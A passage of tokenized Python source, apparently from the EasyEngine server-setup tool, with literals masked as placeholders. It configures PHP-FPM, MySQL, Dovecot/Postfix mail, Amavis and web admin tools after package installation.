"<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and set ( EEVariables . ee_php5_6 ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and set ( EEVariables . ee_php7_0 ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as confifile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( confifile ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> open ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> with open ( "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , recursive = True ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mysql ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . isfile ( "<STR_LIT>" ) : <EOL> config = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config_file = open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> config_file . write ( config ) <EOL> config_file . close ( ) <EOL> else : <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mail ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( hostname = EEVariables . ee_fqdn , <EOL> email = EEVariables . ee_email ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_dovecot = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_dovecot ) <EOL> ee_dovecot . close ( ) <EOL> data = dict ( email = EEVariables . ee_email ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_dovecot = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_dovecot ) <EOL> ee_dovecot . close ( ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( hostname = EEVariables . ee_fqdn , <EOL> email = EEVariables . ee_email ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . Error ( self , "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_sieve = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_sieve ) <EOL> ee_sieve . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" , '<STR_LIT>' , '<STR_LIT>' , <EOL> recursive = True ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mailscanner ) . issubset ( set ( apt_packages ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_amavis = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_amavis ) <EOL> ee_amavis . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> vm_host = os . popen ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . read ( ) <EOL> vm_pass = os . popen ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . read ( ) <EOL> data = dict ( host = vm_host , password = vm_pass ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = vm_config ) <EOL> vm_config . close ( ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> amavis_master = ( """<STR_LIT>""" ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as am_config : <EOL> am_config . write ( amavis_master ) <EOL> try : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if len ( packages ) : <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . copyfile ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> blowfish_key = '<STR_LIT>' . join ( [ random . choice <EOL> ( string . ascii_letters + string . digits ) <EOL> for n in range ( <NUM_LIT:10> ) ] ) <EOL> EEFileUtils . searchreplace ( self , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> . format ( blowfish_key ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . searchreplace ( self , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> . format ( EEVariables . ee_mysql_host ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , <EOL> EEVariables . ee_timezone ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT:100>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> 